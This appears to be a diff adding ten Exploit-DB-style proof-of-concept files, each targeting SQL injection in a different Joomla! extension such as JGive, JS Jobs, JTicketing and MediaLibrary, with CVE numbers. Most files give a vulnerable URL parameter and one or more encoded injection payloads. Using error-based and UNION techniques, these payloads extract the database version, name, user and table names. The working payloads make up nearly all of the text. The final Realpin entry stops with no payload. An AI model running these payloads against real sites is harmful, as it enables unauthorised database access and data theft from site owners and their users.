exploits/php/webapps/44116.txt

@@ -0,0 +1,27 @@
+# # # # 
+# Exploit Title: Joomla! Component JGive 2.0.9 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://techjoomla.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/donations/jgive/
+# Version: 2.0.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5970
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jgive&view=campaigns&layout=all&filter_org_ind_type=[SQL]
+# 
+# JTI3JTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTQxJTRlJTQ0JTIwJTJhJTJmJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTJhJTJmJTI4JTMyJTMyJTJjJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTJhJTJmJTI4JTQ1JTRjJTU0JTI4JTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTMxJTNkJTMxJTJhJTJmJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
+# 
+# 2)
+# http://localhost/[PATH]/index.php/more/campaigns-in-pin-display/campaigns/all/search/:?campaign_countries=[SQL]
+# 
+# JTI3JTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTQxJTRlJTQ0JTIwJTJhJTJmJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTJhJTJmJTI4JTMyJTMyJTJjJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTJhJTJmJTI4JTQ1JTRjJTU0JTI4JTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTMxJTNkJTMxJTJhJTJmJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
+# 
+# # # #

exploits/php/webapps/44117.txt

@@ -0,0 +1,22 @@
+# # # #
+# Exploit Title: Joomla! Component JomEstate PRO <= 3.7 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://comdev.eu/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/jomestate-pro/
+# Version: <= 3.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6368
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jomestate&task=detailed&id=[SQL]
+#  
+# JTM5JTMwJTIwJTIwJTQxJTRlJTQ0JTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTMxJTIwJTY2JTcyJTZmJTZkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQ0JTQ5JTUzJTU0JTQ5JTRlJTQzJTU0JTIwJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM3JTY1JTJjJTMwJTc4JTMyJTM3JTJjJTQzJTQxJTUzJTU0JTI4JTczJTYzJTY4JTY1JTZkJTYxJTVmJTZlJTYxJTZkJTY1JTIwJTQxJTUzJTIwJTQzJTQ4JTQxJTUyJTI5JTJjJTMwJTc4JTMyJTM3JTJjJTMwJTc4JTM3JTY1JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUzJTQzJTQ4JTQ1JTRkJTQxJTU0JTQxJTIwJTU3JTQ4JTQ1JTUyJTQ1JTIwJTc0JTYxJTYyJTZjJTY1JTVmJTczJTYzJTY4JTY1JTZkJTYxJTIxJTNkJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTIwJTRjJTQ5JTRkJTQ5JTU0JTIwJTMxJTJjJTMxJTI5JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTU0JTQxJTQyJTRjJTQ1JTUzJTIwJTRjJTQ5JTRkJTQ5JTU0JTIwJTMwJTJjJTMxJTI5JTJjJTIwJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTU0JTQxJTQyJTRjJTQ1JTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTMxJTNkJTMx
+# 
+# # # #

exploits/php/webapps/44118.txt

@@ -0,0 +1,23 @@
+# # # # 
+# Exploit Title: Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor: http://coderspirit.blogspot.com.tr/2011/07/jquickcontact.html
+# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/jquickcontact/
+# Download: https://sourceforge.net/projects/jquickcontact/files/latest/download
+# Version: 1.3.2.2.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5983
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jquickcontact&task=refresh&sid=[SQL]
+# 
+# dnR0dGo3YXM4MzNvZDVuYTM3OWVlNDAwcDYnJTIwQU5EJTIwRVhUUkFDVFZBTFVFKDIyLENPTkNBVCgweDVjLHZlcnNpb24oKSwoU0VMRUNUJTIwKEVMVCgxPTEsMSkpKSxkYXRhYmFzZSgpKSktLSUyMFg=
+# 
+# # # #

exploits/php/webapps/44119.txt

@@ -0,0 +1,33 @@
+# # # #
+# Exploit Title: Joomla! Component JS Autoz 1.0.9 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://www.joomsky.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/js-autoz/
+# Software Download: http://joomsky.com/js-autoz-download.html
+# Version: 1.0.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6006
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&vtype=[SQL]
+#  
+# JTMxJTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMyJTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTNkJTMxJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&pre=[SQL]
+#  
+# JTMxJTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMyJTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTNkJTMxJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
+# 
+# 3)
+# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&prs=[SQL]
+#  
+# JTMxJTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMyJTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTNkJTMxJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
+#  
+# # # #

exploits/php/webapps/44120.txt

@@ -0,0 +1,28 @@
+# # # #
+# Exploit Title: Joomla! Component JS Jobs 1.1.9 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://www.joomsky.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/js-jobs/
+# Software Download: http://www.joomsky.com/5/download/1.html
+# Version: 1.1.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5994
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)...Everyone
+# http://localhost/[PATH]/index.php/component/jsjobs/newest-jobs?zipcode=[SQL]&option=com_jsjobs&task11=view
+#  
+# JTI3JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMwJTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTdlJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTc0JTQ1JTZmJTZj
+# 
+# 2)...Users
+# http://localhost/[PATH]/index.php?option=com_jsjobs&c=resume&view=resume&layout=view_resume&bd=1&sortby=1&ta=[SQL]
+#  
+# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTM2JTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTMyJTY1JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTI5JTJjJTMwJTM2JTI5JTI5
+# 
+# # # #

exploits/php/webapps/44121.txt

@@ -0,0 +1,31 @@
+# # # #
+# Exploit Title: Joomla! Component JTicketing 2.0.16 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: https://techjoomla.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/jticketing/
+# Version: 2.0.16
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6585
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jticketing&view=events&layout=all&filter_creator=[SQL]
+# 
+# JytVTklPTitBTEwrU0VMRUNUK051TEwsTnVMTCxOdUxMLE51TEwsTnVMTCxOdUxMLE51TEwsTnVMTCxOdUxMLE51TEwsTnVMTCxOdUxMLENPTkNBVCgoU0VMRUNUK0dST1VQX0NPTkNBVCh0YWJsZV9uYW1lK1NFUEFSQVRPUisweDNjNjI3MjNlKStGUk9NK0lORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMrV0hFUkUrVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpKSxOdUxMLE51TEwsTnVMTCxOdUxMLE51TEwsTnVMTCxOdUxMLE51TEwsTnVMTCxOdUxMLE51TEwsTnVMTCxOdUxMLE51TEwsTnVMTCxOdUxMLE51TEwsTnVMTCxOdUxMLE51TEwsTnVMTCxOdUxMLE51TEwsTnVMTCxOdUxMLE51TEwsTnVMTCxOdUxMLS0rLQ==
+# 
+# JTMxJTI3JTYxJTZlJTY0JTIwJTI4JTczJTQ1JTZjJTQ1JTYzJTc0JTIwJTMxJTIwJTY2JTcyJTZmJTZkJTIwJTI4JTczJTQ1JTZjJTQ1JTYzJTc0JTIwJTYzJTZmJTc1JTZlJTc0JTI4JTJhJTI5JTJjJTYzJTZmJTZlJTYzJTYxJTc0JTI4JTI4JTczJTQ1JTZjJTQ1JTYzJTc0JTI4JTczJTQ1JTZjJTQ1JTYzJTc0JTIwJTYzJTZmJTZlJTYzJTYxJTc0JTI4JTYzJTYxJTczJTc0JTI4JTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTIwJTYxJTczJTIwJTYzJTY4JTYxJTcyJTI5JTJjJTMwJTc4JTM3JTY1JTI5JTI5JTIwJTY2JTcyJTZmJTZkJTIwJTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTc0JTYxJTYyJTZjJTY1JTczJTIwJTc3JTY4JTY1JTcyJTY1JTIwJTc0JTYxJTYyJTZjJTY1JTVmJTczJTYzJTY4JTY1JTZkJTYxJTNkJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTIwJTZjJTY5JTZkJTY5JTc0JTIwJTMwJTJjJTMxJTI5JTJjJTY2JTZjJTZmJTZmJTcyJTI4JTcyJTYxJTZlJTY0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTY2JTcyJTZmJTZkJTIwJTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTc0JTYxJTYyJTZjJTY1JTczJTIwJTY3JTcyJTZmJTc1JTcwJTIwJTYyJTc5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI3JTI3JTNkJTI3
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_jticketing&view=events&layout=all&filter_events_cat=[SQL]
+# 
+# JytVTklPTitBTEwrU0VMRUNUK25VbGwsblVsbCxuVWxsLG5VbGwsblVsbCxuVWxsLG5VbGwsblVsbCxuVWxsLG5VbGwsblVsbCxuVWxsLENPTkNBVCgoU0VMRUNUK0dST1VQX0NPTkNBVCh0YWJsZV9uYW1lK1NFUEFSQVRPUisweDNjNjI3MjNlKStGUk9NK0lORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMrV0hFUkUrVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpKSxuVWxsLG5VbGwsblVsbCxuVWxsLG5VbGwsblVsbCxuVWxsLG5VbGwsblVsbCxuVWxsLG5VbGwsblVsbCxuVWxsLG5VbGwsblVsbCxuVWxsLG5VbGwsblVsbCxuVWxsLG5VbGwsblVsbCxuVWxsLG5VbGwsblVsbCxuVWxsLG5VbGwsblVsbCxuVWxsLS0rLQ==
+# 
+# JTMxJTI3JTYxJTZlJTY0JTIwJTI4JTczJTQ1JTZjJTQ1JTYzJTc0JTIwJTMxJTIwJTY2JTcyJTZmJTZkJTIwJTI4JTczJTQ1JTZjJTQ1JTYzJTc0JTIwJTYzJTZmJTc1JTZlJTc0JTI4JTJhJTI5JTJjJTYzJTZmJTZlJTYzJTYxJTc0JTI4JTI4JTczJTQ1JTZjJTQ1JTYzJTc0JTI4JTczJTQ1JTZjJTQ1JTYzJTc0JTIwJTYzJTZmJTZlJTYzJTYxJTc0JTI4JTYzJTYxJTczJTc0JTI4JTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTIwJTYxJTczJTIwJTYzJTY4JTYxJTcyJTI5JTJjJTMwJTc4JTM3JTY1JTI5JTI5JTIwJTY2JTcyJTZmJTZkJTIwJTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTc0JTYxJTYyJTZjJTY1JTczJTIwJTc3JTY4JTY1JTcyJTY1JTIwJTc0JTYxJTYyJTZjJTY1JTVmJTczJTYzJTY4JTY1JTZkJTYxJTNkJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTIwJTZjJTY5JTZkJTY5JTc0JTIwJTMwJTJjJTMxJTI5JTJjJTY2JTZjJTZmJTZmJTcyJTI4JTcyJTYxJTZlJTY0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTY2JTcyJTZmJTZkJTIwJTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTc0JTYxJTYyJTZjJTY1JTczJTIwJTY3JTcyJTZmJTc1JTcwJTIwJTYyJTc5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI3JTI3JTNkJTI3
+# 
+# # # #

exploits/php/webapps/44122.txt

@@ -0,0 +1,26 @@
+# # # # 
+# Exploit Title: Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://ordasoft.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
+# Software Download: http://ordasoft.com/All-Download/Download-document/173-Media-Library-basic-2.1.html
+# Version: 4.0.12
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5971
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # #
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_medialibrary&task=view_author&id=[SQL]
+# MStBTkQoU0VMRUNUKzErRlJPTShTRUxFQ1QrQ09VTlQoKiksQ09OQ0FUKChTRUxFQ1QrKFNFTEVDVCtDT05DQVQoQ0FTVChWRVJTSU9OKCkrQVMrQ0hBUiksMHg3ZSkpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUytMSU1JVCswLDEpLEZMT09SKFJBTkQoMCkqMikpeCtGUk9NK0lORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMrR1JPVVArQlkreClhKStBTkQrMT0x
+# 
+# 2)
+# http://localhost/[PATH]/index.php/component/medialibrary/0/lend_request?Itemid=0&mid[0]=[SQL]
+# NjMgQW5EKygvKiE0NDQ1NXNFbGVDVCovKzB4MzErLyohNDQ0NTVGck9NKi8rKC8qITQ0NDU1c0VsZUNUKi8rY09VTlQoKiksLyohNDQ0NTVDb05DQXQqLygoLyohNDQ0NTVzRWxlQ1QqLygvKiE0NDQ1NXNFbGVDVCovKy8qITQ0NDU1Q29OQ0F0Ki8oY0FzdChkQVRBQkFTRSgpK0FzK2NoYXIpLDB4N2UpKSsvKiE0NDQ1NUZyT00qLytpbmZPck1hdGlvbl9zY2hFbWEudGFibGVzKy8qITQ0NDU1V2hlckUqLyt0YWJsZV9zY2hlbWE9ZEFUQUJBU0UoKStsaW1pdCswLDEpLGZsb29yKHJhTkQoMCkqMikpeCsvKiE0NDQ1NUZyT00qLytpbmZPck1hdGlvbl9zY2hFbWEudEFCTEVTKy8qITQ0NDU1Z1JPVVAqLytiWSt4KWEpK2FORCsxPTE=
+# 
+# # # #

exploits/php/webapps/44123.txt

@@ -0,0 +1,25 @@
+# # # #
+# Exploit Title: Joomla! Component NeoRecruit 4.1 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://neojoomla.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/neorecruit/
+# Version: 4.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6370
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/neorecruit/all-offers/xxx[SQL].html
+# http://localhost/[PATH]/neorecruit/xxx/xxx[SQL]
+#  
+# JTI3JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM3JTMwJTM0JTMxJTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI3JTQ1JTY2JTY1JTI3JTNkJTI3JTQ1JTY2JTY1
+# 
+# J2FuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0KHNlbGVjdCBjb25jYXQoY2FzdChkYXRhYmFzZSgpIGFzIGNoYXIpLDB4N2UpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkgQU5EICcnPSc=
+# 
+# # # #

exploits/php/webapps/44124.txt

@@ -0,0 +1,22 @@
+# # # #
+# Exploit Title: Joomla! Component Project Log 1.5.3 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: https://extensions.thethinkery.net/
+# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/project-a-task-management/project-log/
+# Version: 1.5.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6024
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_projectlog&view=cat&search=[SQL]
+#  
+# JTJkJTYxJTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTMxJTJjJTMyJTJjJTMzJTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQ3JTUyJTRmJTU1JTUwJTVmJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc0JTYxJTYyJTZjJTY1JTVmJTZlJTYxJTZkJTY1JTIwJTUzJTQ1JTUwJTQxJTUyJTQxJTU0JTRmJTUyJTIwJTMwJTc4JTMzJTYzJTM2JTMyJTM3JTMyJTMzJTY1JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTU0JTQxJTQyJTRjJTQ1JTUzJTIwJTU3JTQ4JTQ1JTUyJTQ1JTIwJTU0JTQxJTQyJTRjJTQ1JTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTNkJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTI5JTJjJTM1JTJjJTM2JTJjJTM3JTJjJTM4JTJjJTM5JTJjJTMxJTMwJTJjJTMxJTMxJTJjJTMxJTMyJTJjJTMxJTMzJTJjJTMxJTM0JTJjJTMxJTM1JTJjJTMxJTM2JTJjJTMxJTM3JTJjJTMxJTM4JTJjJTMxJTM5JTJjJTMyJTMwJTJjJTMyJTMxJTJjJTMyJTMyJTJjJTMyJTMzJTJjJTMyJTM0JTJjJTMyJTM1JTJjJTMyJTM2JTJjJTMyJTM3JTJjJTMyJTM4JTJjJTMyJTM5JTJjJTMzJTMwJTJkJTJkJTIwJTJk
+#    
+# # # #

exploits/php/webapps/44125.txt

@@ -0,0 +1,23 @@
+# # # #
+# Exploit Title: Joomla! Component Realpin <= 1.5.04 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://realpin.frumania.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-display/realpin/
+# Software Download: http://realpin.frumania.com/downloads/com_realpin_j3.1_1.5.04.zip
+# Version: <= 1.5.04
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6005
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_realpin&pinboard=[SQL]
+#  
+# 